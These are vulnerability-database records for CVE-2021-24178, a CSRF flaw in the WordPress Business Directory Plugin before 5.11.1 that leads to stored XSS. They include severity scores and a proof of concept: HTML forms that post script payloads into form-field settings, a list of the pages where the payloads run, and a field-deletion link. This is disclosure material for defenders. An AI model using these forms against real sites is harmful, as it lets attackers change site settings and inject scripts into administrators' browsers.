The plugin suffered from Cross-Site Request Forgery issues, allowing an attacker to make a logged in administrator add, edit or delete form fields, which could also lead to Stored Cross-Site Scripting issues. Note (WPScanTeam): The CSRF has ben fixed and proper capability checks have also been added in 5.11.1, however some sanitisation was still missing, still allowing XSS via a high privilege account in other pages and a different issue has been created for it
{"id": "WPEX-ID:700F3B04-8298-447C-8D3C-4581880A63B5", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Business Directory Plugin < 5.11.1 - Arbitrary Add/Edit/Delete Form Field to Stored XSS", "description": "The plugin suffered from Cross-Site Request Forgery issues, allowing an attacker to make a logged in administrator add, edit or delete form fields, which could also lead to Stored Cross-Site Scripting issues. Note (WPScanTeam): The CSRF has ben fixed and proper capability checks have also been added in 5.11.1, however some sanitisation was still missing, still allowing XSS via a high privilege account in other pages and a different issue has been created for it\n", "published": "2021-04-11T00:00:00", "modified": "2021-04-15T07:01:52", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "0xB9", "references": [], "cvelist": ["CVE-2021-24178"], "immutableFields": [], "lastseen": "2021-05-14T11:29:20", "viewCount": 34, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24178"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:700F3B04-8298-447C-8D3C-4581880A63B5"]}], "rev": 4}, "score": {"value": 4.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24178"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:700F3B04-8298-447C-8D3C-4581880A63B5"]}]}, "exploitation": null, "vulnersScore": 4.0}, "sourceData": "<!-- Change Form Field XSS -->\r\n<form action=\"https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=editfield&id=1\" method=\"post\">\r\n<input type=\"hidden\" name=\"field[id]\" value=\"1\">\r\n<input type=\"hidden\" name=\"field[tag]\" value=\"title\"> <input type=\"hidden\" name=\"field[weight]\" value=\"9\">\r\n<label> Field Label </label>\r\n<input name=\"field[label]\" type=\"text\" aria-required=\"true\" value=\"<script>alert(1)</script>\">\r\n<label> Field description <span class=\"description\">(optional)</span></label>\r\n<input name=\"field[description]\" type=\"text\" value=\"<script>alert(1)</script>\">\r\n<input type=\"submit\" name=\"submit\" id=\"submit\" class=\"button button-primary\" value=\"Update Field\">\r\n</form>\r\n\r\n<!-- Add Form Field XSS -->\r\n<form action=\"https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=editfield&id=1\" method=\"post\">\r\n<label> Field Label </label>\r\n<input name=\"field[label]\" type=\"text\" aria-required=\"true\" value=\"<script>alert(1)</script>\"> \r\n<label> Field description <span class=\"description\">(optional)</span></label>\r\n<input name=\"field[description]\" type=\"text\" value=\"<script>alert(1)</script>\">\r\n<input type=\"submit\" name=\"submit\" id=\"submit\" class=\"button button-primary\" value=\"Update Field\"> \r\n</form>\r\n\r\nXSS payloads execute:\r\n- On the business directory page when adding a listing: /business-directory/?wpbdp_view=submit_listing\r\n- On the Import/Export page: /wp-admin/admin.php?page=wpbdp_admin_csv\r\n- When adding/editing a listing /wp-admin/post-new.php?post_type=wpbdp_listing\r\n- On various Settings page, such as /wp-admin/admin.php?page=wpbdp_settings&tab=listings&subtab=listings%2Fsorting, /wp-admin/admin.php?page=wpbdp_settings&tab=listings&subtab=search_settings\r\n\r\n<!-- Delete Form Field-->\r\n<a href=\"https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=deletefield&id=1\">Delete</a>", "generation": 1, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645946249}}
{"cve": [{"lastseen": "2022-03-23T14:48:41", "description": "The Business Directory Plugin \u00e2\u20ac\u201c Easy Listing Directories for WordPress WordPress plugin before 5.11.1 suffered from Cross-Site Request Forgery issues, allowing an attacker to make a logged in administrator add, edit or delete form fields, which could also lead to Stored Cross-Site Scripting issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-24178", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24178"], "modified": "2021-05-13T18:01:00", "cpe": [], "id": "CVE-2021-24178", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24178", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2021-05-14T11:29:20", "bulletinFamily": "software", "cvelist": ["CVE-2021-24178"], "description": "The plugin suffered from Cross-Site Request Forgery issues, allowing an attacker to make a logged in administrator add, edit or delete form fields, which could also lead to Stored Cross-Site Scripting issues. Note (WPScanTeam): The CSRF has ben fixed and proper capability checks have also been added in 5.11.1, however some sanitisation was still missing, still allowing XSS via a high privilege account in other pages and a different issue has been created for it\n\n### PoC\n\nField Label Field description (optional) Field Label Field description (optional) XSS payloads execute: \\- On the business directory page when adding a listing: /business-directory/?wpbdp_view=submit_listing \\- On the Import/Export page: /wp-admin/admin.php?page=wpbdp_admin_csv \\- When adding/editing a listing /wp-admin/post-new.php?post_type=wpbdp_listing \\- On various Settings page, such as /wp-admin/admin.php?page=wpbdp_settings&tab;=listings&subtab;=listings%2Fsorting, /wp-admin/admin.php?page=wpbdp_settings&tab;=listings&subtab;=search_settings [Delete](<https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=deletefield&id=1>)\n", "modified": "2021-04-15T07:01:52", "id": "WPVDB-ID:700F3B04-8298-447C-8D3C-4581880A63B5", "href": "https://wpscan.com/vulnerability/700f3b04-8298-447c-8d3c-4581880a63b5", "published": "2021-04-11T00:00:00", "type": "wpvulndb", "title": "Business Directory Plugin < 5.11.1 - Arbitrary Add/Edit/Delete Form Field to Stored XSS", "sourceData": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
Business Directory Plugin < 5.11.1 - Arbitrary Add/Edit/Delete Form Field to Stored XSS
